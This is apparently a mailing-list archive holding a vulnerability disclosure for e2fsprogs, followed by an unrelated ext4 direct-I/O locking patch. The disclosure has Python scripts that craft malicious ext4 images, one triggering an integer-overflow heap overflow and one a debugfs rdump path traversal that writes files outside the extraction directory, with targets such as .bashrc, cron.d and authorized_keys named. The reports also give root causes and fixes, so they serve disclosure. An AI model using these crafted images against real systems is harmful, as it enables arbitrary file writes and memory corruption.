EXT4_FEATURE_RO_COMPAT_DIR_NLINK = 0x0020
EXT4_FEATURE_RO_COMPAT_EXTRA_ISIZE = 0x0040
EXT4_FEATURE_RO_COMPAT_METADATA_CSUM = 0x0400
EXT2_FEATURE_COMPAT_EXT_ATTR = 0x0008
EXT2_FEATURE_COMPAT_RESIZE_INODE = 0x0010
EXT2_FEATURE_COMPAT_DIR_INDEX = 0x0020
EXT2_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024
def read_u32(data, off):
return struct.unpack_from('<I', data, off)[0]
def read_u16(data, off):
return struct.unpack_from('<H', data, off)[0]
def write_u32(data, off, val):
struct.pack_into('<I', data, off, val & 0xFFFFFFFF)
def write_u16(data, off, val):
struct.pack_into('<H', data, off, val & 0xFFFF)
def write_u8(data, off, val):
struct.pack_into('<B', data, off, val & 0xFF)
def create_crafted_image(path, size_mb=128):
"""Create a crafted ext4 image from scratch (no mke2fs dependency).
We write the superblock, group descriptor, and minimal structures
directly to bypass any tool-level validation.
"""
blocksize = 65536 # 64K blocks
log_block_size = 6 # 1024 << 6 = 65536
inode_size = 16384 # 16K inodes
inodes_per_group = 0x40001 # 262145
# 1 group with 1024 blocks. Total = 1024 * 64K = 64MB
blocks_per_group = 1024
first_data_block = 0
blocks_count = blocks_per_group # 1 group
groups_cnt = 1
inodes_count = groups_cnt * inodes_per_group # 262145
# Verify the overflow
product = (inodes_per_group * inode_size) & 0xFFFFFFFF
inode_blocks_per_group = (product + blocksize - 1) // blocksize
correct_ibpg = (inodes_per_group * inode_size + blocksize - 1) // blocksize
print(f"\n=== Overflow Analysis ===")
print(f" blocksize = {blocksize}")
print(f" inode_size = {inode_size}")
print(f" inodes_per_group = {inodes_per_group} (0x{inodes_per_group:08X})")
print(f" true product = {inodes_per_group * inode_size} (0x{inodes_per_group * inode_size:X})")
print(f" truncated product = {product} (0x{product:08X})")
print(f" inode_blocks_per_group (buggy) = {inode_blocks_per_group}")
print(f" inode_blocks_per_group (correct) = {correct_ibpg}")
print(f" groups_cnt = {groups_cnt}")
print(f" inodes_count = {inodes_count}")
# Verify openfs.c checks will pass:
# 1. s_log_block_size <= 6
assert log_block_size <= 6
# 2. inode_size >= 128, <= blocksize, power of 2
assert inode_size >= 128
assert inode_size <= blocksize
assert (inode_size & (inode_size - 1)) == 0
# 3. blocks_per_group >= 8
assert blocks_per_group >= 8
# 4. blocks_per_group <= EXT2_MAX_BLOCKS_PER_GROUP = 65528
assert blocks_per_group <= 65528
# 5. inode_blocks_per_group <= EXT2_MAX_INODES_PER_GROUP
max_ipg = 65536 - (blocksize // inode_size) # 65536 - 4 = 65532
assert inode_blocks_per_group <= max_ipg
# 6. EXT2_DESC_PER_BLOCK = blocksize / 32 = 2048. Non-zero.
assert (blocksize // 32) != 0
# 7. first_data_block < blocks_count
assert first_data_block < blocks_count
# 8. groups_cnt < 2^32
assert groups_cnt < (1 << 32)
# 9. groups_cnt * inodes_per_group == inodes_count
assert groups_cnt * inodes_per_group == inodes_count
# 10. Bitmap check: inodes_per_group / 8 <= blocksize
inode_bitmap_bytes = inodes_per_group // 8
# 262145 / 8 = 32768.125 -> integer division = 32768
# But the check uses inodes_per_group / 8 which needs to be <= blocksize
# Note: this is integer division in C, and 262145 is odd, so 262145/8 = 32768
# But the bitmap needs to cover all inodes, so it should be (262145+7)/8 = 32769
# Actually the code uses EXT2_INODES_PER_GROUP / 8 as integer division
assert (inodes_per_group // 8) <= blocksize, \
f"inode bitmap {inodes_per_group // 8} > blocksize {blocksize}"
print(" All validation checks pass!")
# Create the image
image_size = blocks_count * blocksize
print(f"\n Image size = {image_size} bytes ({image_size // (1024*1024)} MB)")
data = bytearray(image_size)
# === Write superblock at offset 1024 ===
sb_off = SUPERBLOCK_OFFSET
write_u32(data, sb_off + OFF_INODES_COUNT, inodes_count)
write_u32(data, sb_off + OFF_BLOCKS_COUNT, blocks_count)
write_u32(data, sb_off + OFF_R_BLOCKS_COUNT, 0)
write_u32(data, sb_off + OFF_FREE_BLOCKS_COUNT, max(0, blocks_count - 6))
write_u32(data, sb_off + OFF_FREE_INODES_COUNT, inodes_count - 11)
write_u32(data, sb_off + OFF_FIRST_DATA_BLOCK, first_data_block)
write_u32(data, sb_off + OFF_LOG_BLOCK_SIZE, log_block_size)
write_u32(data, sb_off + OFF_LOG_CLUSTER_SIZE, log_block_size)
write_u32(data, sb_off + OFF_BLOCKS_PER_GROUP, blocks_per_group)
write_u32(data, sb_off + OFF_CLUSTERS_PER_GROUP, blocks_per_group)
write_u32(data, sb_off + OFF_INODES_PER_GROUP, inodes_per_group)
write_u16(data, sb_off + OFF_MAGIC, EXT2_SUPER_MAGIC)
write_u16(data, sb_off + OFF_STATE, 1) # EXT2_VALID_FS
write_u32(data, sb_off + OFF_REV_LEVEL, 1) # EXT2_DYNAMIC_REV
write_u32(data, sb_off + OFF_FIRST_INO, 11)
write_u16(data, sb_off + OFF_INODE_SIZE, inode_size)
write_u16(data, sb_off + OFF_BLOCKS_COUNT_HI, 0)
# Feature flags: minimal. No 64bit, no metadata_csum, no journal.
feat_compat = 0 # nothing
feat_incompat = EXT2_FEATURE_INCOMPAT_FILETYPE
feat_ro_compat = (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER |
EXT2_FEATURE_RO_COMPAT_LARGE_FILE)
write_u32(data, sb_off + OFF_FEATURE_COMPAT, feat_compat)
write_u32(data, sb_off + OFF_FEATURE_INCOMPAT, feat_incompat)
write_u32(data, sb_off + OFF_FEATURE_RO_COMPAT, feat_ro_compat)
write_u16(data, sb_off + OFF_DESC_SIZE, 0)
write_u8(data, sb_off + OFF_LOG_GROUPS_PER_FLEX, 0)
write_u8(data, sb_off + OFF_CHECKSUM_TYPE, 0)
write_u16(data, sb_off + OFF_RESERVED_GDT_BLOCKS, 0)
# === Write Group Descriptor at block 1 ===
# Block 0 contains the superblock (at offset 1024 within the block).
# Block 1 is the group descriptor table.
gdt_off = 1 * blocksize # 65536
# bg_block_bitmap: block 2
# bg_inode_bitmap: block 3
# bg_inode_table: block 4 (only 1 block due to overflow!)
struct.pack_into('<I', data, gdt_off + 0x00, 2) # bg_block_bitmap
struct.pack_into('<I', data, gdt_off + 0x04, 3) # bg_inode_bitmap
struct.pack_into('<I', data, gdt_off + 0x08, 4) # bg_inode_table
struct.pack_into('<H', data, gdt_off + 0x0C, max(0, blocks_count - 6)) # bg_free_blocks_count
struct.pack_into('<H', data, gdt_off + 0x0E, min(inodes_count - 11, 65535)) # bg_free_inodes_count
struct.pack_into('<H', data, gdt_off + 0x10, 2) # bg_used_dirs_count
struct.pack_into('<H', data, gdt_off + 0x12, 0) # bg_flags
# === Write a minimal root inode (inode 2) in the inode table ===
# Inode table starts at block 4, offset = 4 * 65536 = 262144.
# Inode 2 (root) is at index 1 (0-based), so offset = 262144 + 1 * 16384.
# Inode 1 is special "bad blocks" inode.
inode_table_off = 4 * blocksize
root_inode_off = inode_table_off + 1 * inode_size # inode 2
# Minimal inode: directory, mode=0755
i_mode = 0o40755 # S_IFDIR | 0755
struct.pack_into('<H', data, root_inode_off + 0x00, i_mode) # i_mode
struct.pack_into('<H', data, root_inode_off + 0x02, 0) # i_uid
struct.pack_into('<I', data, root_inode_off + 0x04, blocksize) # i_size
struct.pack_into('<H', data, root_inode_off + 0x1A, 2) # i_links_count
# Write the image
with open(path, 'wb') as f:
f.write(data)
print(f"\nImage written to: {path}")
return data
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <output_image>")
sys.exit(1)
output_path = sys.argv[1]
print("Creating crafted ext4 image with inode_blocks_per_group overflow...")
data = create_crafted_image(output_path)
# Print superblock verification
print(f"\nSuperblock verification:")
sb = data[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET+256]
print(f" s_inodes_count = {struct.unpack_from('<I', sb, 0x00)[0]}")
print(f" s_blocks_count = {struct.unpack_from('<I', sb, 0x04)[0]}")
print(f" s_first_data_block = {struct.unpack_from('<I', sb, 0x14)[0]}")
print(f" s_log_block_size = {struct.unpack_from('<I', sb, 0x18)[0]}")
print(f" s_blocks_per_group = {struct.unpack_from('<I', sb, 0x20)[0]}")
print(f" s_inodes_per_group = {struct.unpack_from('<I', sb, 0x28)[0]} (0x{struct.unpack_from('<I', sb, 0x28)[0]:08X})")
print(f" s_magic = 0x{struct.unpack_from('<H', sb, 0x38)[0]:04X}")
print(f" s_rev_level = {struct.unpack_from('<I', sb, 0x4C)[0]}")
print(f" s_inode_size = {struct.unpack_from('<H', sb, 0x58)[0]}")
print(f" s_feature_compat = 0x{struct.unpack_from('<I', sb, 0x5C)[0]:08X}")
print(f" s_feature_incompat = 0x{struct.unpack_from('<I', sb, 0x60)[0]:08X}")
print(f" s_feature_ro_compat= 0x{struct.unpack_from('<I', sb, 0x64)[0]:08X}")
# Show the overflow math
ipg = struct.unpack_from('<I', sb, 0x28)[0]
isz = struct.unpack_from('<H', sb, 0x58)[0]
bsz = 1024 << struct.unpack_from('<I', sb, 0x18)[0]
product_full = ipg * isz
product_trunc = product_full & 0xFFFFFFFF
ibpg_buggy = (product_trunc + bsz - 1) // bsz
ibpg_correct = (product_full + bsz - 1) // bsz
print(f"\n Overflow demonstration:")
print(f" {ipg} * {isz} = {product_full} (0x{product_full:X})")
print(f" truncated to 32 bits = {product_trunc} (0x{product_trunc:X})")
print(f" inode_blocks_per_group (buggy) = {ibpg_buggy}")
print(f" inode_blocks_per_group (correct) = {ibpg_correct}")
print(f" Ratio: buggy is {ibpg_correct / ibpg_buggy:.0f}x too small!")
print(f"\n With buggy value, only {ibpg_buggy * bsz // isz} inodes are")
print(f" addressable in the inode table, but the FS claims {ipg}.")
print(f" Any inode > {ibpg_buggy * bsz // isz} will cause an OOB read.")
if __name__ == '__main__':
main()
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #3: craft_path_traversal.py --]
[-- Type: text/x-python-script; name="craft_path_traversal.py", Size: 5972 bytes --]
#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers path traversal in
debugfs rdump.
Bug: debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
The 'name' comes from directory entries on the crafted filesystem.
If name contains "../" components, files are written outside the
intended dump directory.
Additionally, symlink targets are read from the filesystem (line 215/226)
and created on the host (line 242), allowing arbitrary symlink creation.
Usage:
python3 craft_path_traversal.py output.img
debugfs output.img -R "rdump / /tmp/safe_dir"
# Result: file created at /tmp/traversal_proof (outside safe_dir)
"""
import struct
import sys
import subprocess
def create_base_image(path, size_mb=4):
with open(path, 'wb') as f:
f.write(b'\x00' * size_mb * 1024 * 1024)
subprocess.run([
'mke2fs', '-t', 'ext4', '-F',
'-b', '1024',
'-N', '128',
'-O', '^has_journal,^extents',
path
], check=True, capture_output=True)
def patch_traversal(img_path):
"""Add a directory entry with ../ in the name pointing to a regular file."""
with open(img_path, 'r+b') as f:
# Read superblock
f.seek(1024)
sb = f.read(1024)
s_log_block_size = struct.unpack_from('<I', sb, 24)[0]
s_inode_size = struct.unpack_from('<H', sb, 88)[0]
s_inodes_per_group = struct.unpack_from('<I', sb, 40)[0]
block_size = 1024 << s_log_block_size
# Read group descriptor
gd_offset = block_size * 2 if block_size == 1024 else block_size
f.seek(gd_offset)
gd = f.read(64)
inode_table_block = struct.unpack_from('<I', gd, 8)[0]
inode_table_offset = inode_table_block * block_size
# Use inode 12 for a regular file with content
target_ino = 12
target_offset = inode_table_offset + (target_ino - 1) * s_inode_size
f.seek(target_offset)
inode_data = bytearray(f.read(s_inode_size))
# Set as regular file (mode 0100644)
struct.pack_into('<H', inode_data, 0, 0o100644)
struct.pack_into('<H', inode_data, 2, 0) # uid
# Content stored in i_block (inline for small files)
content = b'TRAVERSAL_PROOF: file written outside dump directory\n'
struct.pack_into('<I', inode_data, 4, len(content)) # i_size
struct.pack_into('<H', inode_data, 26, 1) # i_links_count
# Allocate a data block for the file content
# Use block 100 (should be free in a small fs)
data_block = 100
struct.pack_into('<I', inode_data, 40, data_block) # i_block[0]
struct.pack_into('<I', inode_data, 28, 2) # i_blocks (in 512-byte sectors)
f.seek(target_offset)
f.write(inode_data)
# Write content to the data block
f.seek(data_block * block_size)
f.write(content + b'\x00' * (block_size - len(content)))
# Now add a directory entry in root with name "../../tmp/traversal_proof"
# This will cause rdump to write outside the dump directory
root_offset = inode_table_offset + (2 - 1) * s_inode_size
f.seek(root_offset)
root_inode = bytearray(f.read(s_inode_size))
root_block = struct.unpack_from('<I', root_inode, 40)[0]
dir_offset = root_block * block_size
f.seek(dir_offset)
dir_data = bytearray(f.read(block_size))
# Find last entry and add our traversal entry
pos = 0
last_entry_pos = 0
while pos < block_size:
inode_num = struct.unpack_from('<I', dir_data, pos)[0]
rec_len = struct.unpack_from('<H', dir_data, pos + 4)[0]
if rec_len == 0:
break
if inode_num != 0:
last_entry_pos = pos
next_pos = pos + rec_len
if next_pos >= block_size:
break
pos = next_pos
last_rec_len = struct.unpack_from('<H', dir_data, last_entry_pos + 4)[0]
last_name_len = dir_data[last_entry_pos + 6]
actual_last_size = ((8 + last_name_len + 3) // 4) * 4
remaining = last_rec_len - actual_last_size
# Path traversal name - goes up from /tmp/out3 to /tmp/
entry_name = b'../../tmp/traversal_proof'
new_entry_size = ((8 + len(entry_name) + 3) // 4) * 4
if remaining >= new_entry_size:
struct.pack_into('<H', dir_data, last_entry_pos + 4, actual_last_size)
new_pos = last_entry_pos + actual_last_size
struct.pack_into('<I', dir_data, new_pos, target_ino)
struct.pack_into('<H', dir_data, new_pos + 4, remaining)
dir_data[new_pos + 6] = len(entry_name)
dir_data[new_pos + 7] = 1 # file_type = regular
dir_data[new_pos + 8:new_pos + 8 + len(entry_name)] = entry_name
f.seek(dir_offset)
f.write(dir_data)
print(f"Added traversal dir entry: '{entry_name.decode()}' -> inode {target_ino}")
else:
print(f"Not enough space (need {new_entry_size}, have {remaining})")
sys.exit(1)
# Mark inode 12 as used in bitmap
inode_bitmap_block = struct.unpack_from('<I', gd, 4)[0]
f.seek(inode_bitmap_block * block_size)
bitmap = bytearray(f.read(block_size))
byte_idx = (target_ino - 1) // 8
bit_idx = (target_ino - 1) % 8
bitmap[byte_idx] |= (1 << bit_idx)
f.seek(inode_bitmap_block * block_size)
f.write(bitmap)
print(f"Patched image with path traversal entry")
print(f"Trigger: debugfs {img_path} -R 'rdump / /tmp/out3'")
print(f"Expected: file created at /tmp/traversal_proof (outside /tmp/out3)")
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <output.img>")
sys.exit(1)
output = sys.argv[1]
create_base_image(output)
patch_traversal(output)
if __name__ == '__main__':
main()
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #4: REPORT-inode-blocks-overflow.md --]
[-- Type: text/markdown; name="REPORT-inode-blocks-overflow.md", Size: 7015 bytes --]
# e2fsprogs: Integer overflow in inode_blocks_per_group causes heap buffer overflow
## Summary
A 32-bit integer overflow in `ext2fs_open2()` when computing
`inode_blocks_per_group` from untrusted superblock fields allows a
crafted filesystem image to cause a heap buffer overflow in any
libext2fs consumer that scans inodes (debugfs, dumpe2fs, fuse2fs, etc.).
## Affected Component
- File: `lib/ext2fs/openfs.c`, line 359-362
- Downstream crash: `lib/ext2fs/inode.c`, line 659
- Versions: all current versions including 1.47.4
- Affected tools: `debugfs`, `dumpe2fs`, `fuse2fs`, `e2image`, and any
program using `ext2fs_open()` + inode scanning. Note: `e2fsck` has an
additional `check_super_value` guard that catches this, so e2fsck is
NOT affected.
## Severity
**High** — Heap buffer overflow (memcpy with negative/huge size) leading
to crash. Potential code execution with a carefully crafted image.
## Root Cause
In `ext2fs_open2()`, the inode table size per group is computed as:
```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
```
`EXT2_INODES_PER_GROUP` is `s_inodes_per_group` (`__u32`) and
`EXT2_INODE_SIZE` is `s_inode_size` (`__u16` promoted to `int`). Under C
integer promotion rules, the multiplication yields `unsigned int`
(32-bit), silently truncating results that exceed 2^32.
The validation at line 397 compares the already-truncated value:
```c
fs->inode_blocks_per_group > EXT2_MAX_INODES_PER_GROUP(fs->super)
```
This passes because the truncated value is small.
## Crash Chain
With `s_inodes_per_group = 262145` and `s_inode_size = 16384`:
1. **openfs.c:359**: `262145 * 16384 = 0x100004000` truncates to
`0x4000 = 16384`. Result: `inode_blocks_per_group = 1` (should be
65537).
2. **inode.c:293**: Inode scan sets `blocks_left = 1`, reads only 1
block (4 inodes worth of data).
3. **inode.c:727**: After exhausting the buffer, `bytes_left -= inode_size`
produces `bytes_left = -16384`.
4. **inode.c:659**: `memcpy(temp_buffer, ptr, bytes_left)` — `bytes_left`
is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
buffer overflow**.
## Proof of Concept
### ASAN crash output
```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
#0 __interceptor_memcpy
#1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
#2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
#3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
#4 do_lsdel /src/debugfs/lsdel.c:182
```
### Reproduction
```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
/src/debugfs/debugfs /work/t.img -R lsdel'
```
### PoC script
```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.
The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().
Values used:
blocksize = 65536 (s_log_block_size = 6)
s_inode_size = 16384 (power of 2, <= blocksize)
s_inodes_per_group = 262145 (0x40001)
Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys
def main():
path = sys.argv[1]
BLOCKSIZE = 65536
LOG_BLOCK_SIZE = 6
INODE_SIZE = 16384
INODES_PER_GROUP = 262145
BLOCKS_PER_GROUP = 1024
BLOCKS_COUNT = 1024
FIRST_DATA_BLOCK = 0
GROUPS_COUNT = 1
INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
DESC_SIZE = 32
img_size = BLOCKS_COUNT * BLOCKSIZE
img = bytearray(img_size)
# --- Superblock at offset 1024 ---
sb_off = 1024
struct.pack_into('<I', img, sb_off + 0, INODES_COUNT) # s_inodes_count
struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT) # s_blocks_count_lo
struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE) # s_log_block_size
struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE) # s_log_cluster_size
struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP) # s_blocks_per_group
struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP) # s_clusters_per_group
struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP) # s_inodes_per_group
struct.pack_into('<H', img, sb_off + 56, 0xEF53) # s_magic
struct.pack_into('<H', img, sb_off + 58, 1) # s_state = VALID
struct.pack_into('<H', img, sb_off + 62, 1) # s_min_extra_isize
struct.pack_into('<I', img, sb_off + 76, 1) # s_rev_level = DYNAMIC
struct.pack_into('<H', img, sb_off + 88, INODE_SIZE) # s_inode_size
struct.pack_into('<I', img, sb_off + 96, 0x0002) # s_feature_incompat = FILETYPE
struct.pack_into('<I', img, sb_off + 100, 0x0003) # s_feature_ro_compat
struct.pack_into('<I', img, sb_off + 20, 1) # s_first
struct.pack_into('<H', img, sb_off + 254, DESC_SIZE) # s_desc_size
# --- Group descriptor at block 1 ---
gd_off = BLOCKSIZE
inode_table_block = 3
struct.pack_into('<I', gd_off + img, 0, 2) # bg_block_bitmap
struct.pack_into('<I', gd_off + img, 4, 2) # bg_inode_bitmap
struct.pack_into('<I', gd_off + img, 8, inode_table_block) # bg_inode_table
with open(path, 'wb') as f:
f.write(img)
product = INODES_PER_GROUP * INODE_SIZE
truncated = product & 0xFFFFFFFF
buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE
print(f"Image: {path} ({img_size} bytes)")
print(f" {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
print(f" Truncated to 32-bit: {truncated} (0x{truncated:X})")
print(f" inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
print(f"Trigger: debugfs {path} -R lsdel")
if __name__ == '__main__':
main()
```
## Suggested Fix
Use 64-bit arithmetic for the multiplication:
```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
```
Additionally, add a validation check after the computation:
```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
> (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
retval = EXT2_ET_CORRUPT_SUPERBLOCK;
goto cleanup;
}
```
## Timeline
- 2026-06-07: Bug discovered during security audit
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]
# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write
## Summary
`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.
## Affected Component
- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4
## Severity
**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.
## Root Cause
In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:
```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```
The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):
```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```
No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.
Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:
```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```
This allows the attacker to also create arbitrary symlinks on the host.
## Impact
An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with `debugfs -R "rdump / <dir>"`,
the attacker's files are written outside the extraction directory.
Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations
## Proof of Concept
### Setup
Build the Docker reproduction environment:
```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```
### Reproduction
```bash
docker run --rm -it e2fs-victim
```
Inside the container:
```bash
# Check home directory — clean
ls -la /home/victim/
# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"
# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```
**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.
### Manual image crafting (without Docker)
```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys
IMG = sys.argv[1]
# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
'-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)
# Write a payload file
with open('/tmp/_payload', 'w') as f:
f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
capture_output=True)
# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
f.seek(1024)
sb = f.read(1024)
bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
isz = struct.unpack_from('<H', sb, 88)[0]
gd_off = bs * 2 if bs == 1024 else bs
f.seek(gd_off)
gd = f.read(64)
itable = struct.unpack_from('<I', gd, 8)[0]
f.seek(itable * bs + isz) # root inode
ri = f.read(isz)
rblk = struct.unpack_from('<I', ri, 40)[0]
f.seek(rblk * bs)
dd = bytearray(f.read(bs))
pos = 0
while pos < bs:
rl = struct.unpack_from('<H', dd, pos+4)[0]
nl = dd[pos+6]
if dd[pos+8:pos+8+nl] == b'testfile':
evil = b'../../tmp/escaped'
dd[pos+6] = len(evil)
dd[pos+8:pos+8+len(evil)] = evil
break
if pos + rl >= bs: break
pos += rl
f.seek(rblk * bs)
f.write(dd)
# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```
## Suggested Fix
Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes
Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.
Example fix for `rdump_dirent()`:
```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
...
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
/* Reject path traversal in directory entry names */
if (strchr(name, '/') || strcmp(name, "..") == 0 ||
strstr(name, "../") || strstr(name, "/..")) {
com_err("rdump", 0,
"skipping entry with path traversal: %s", name);
return 0;
}
...
}
```
## Timeline
- 2026-06-07: Bug discovered during security audit
^ permalink raw reply
* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang
Cc: linux-ext4, inux-kernel, Peng Wang
ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock. It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.
ext4_map_blocks() maps at most one extent per call. When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length. ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.
On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition. The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers. This serialises all writers to queue-depth 1
and throughput collapses.
Fix by looping ext4_map_blocks() over the remaining range. As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.
The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten. This is correct for the two callers:
- (unaligned_io && unwritten) takes the exclusive lock, which is
needed if any block requires partial-block zeroing.
- (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
which skips journal transactions and is only safe when every block
is written/mapped.
The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.
Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes. Thread 2 reads from
the tail of the file in up to 1 MB reads. Both use the same fd with
the file preallocated via posix_fallocate().
Tested on ext4 over NVMe, 6.6 based kernel:
before after
writer-only throughput: 399 MB/s 412 MB/s
mixed (writer + reader): 11 MB/s 381 MB/s
write latency (mixed): 880 us 21 us
rwsem_down_write_slowpath
(5 s sample, mixed): 1792 2
Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
fs/ext4/file.c | 25 ++++++++++++++++---------
1 file changed, 16 insertions(+), 9 deletions(-)
diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
blklen = map.m_len;
- err = ext4_map_blocks(NULL, inode, &map, 0);
- if (err != blklen)
- return false;
- /*
- * 'err==len' means that all of the blocks have been preallocated,
- * regardless of whether they have been initialized or not. We need to
- * check m_flags to distinguish the unwritten extents.
- */
- *unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+ *unwritten = false;
+
+ while (blklen > 0) {
+ map.m_len = blklen;
+ err = ext4_map_blocks(NULL, inode, &map, 0);
+ /*
+ * err <= 0 means a hole or error; the write needs block
+ * allocation so it cannot be treated as an overwrite.
+ */
+ if (err <= 0)
+ return false;
+ if (!(map.m_flags & EXT4_MAP_MAPPED))
+ *unwritten = true;
+ blklen -= err;
+ map.m_lblk += err;
+ }
return true;
}
--
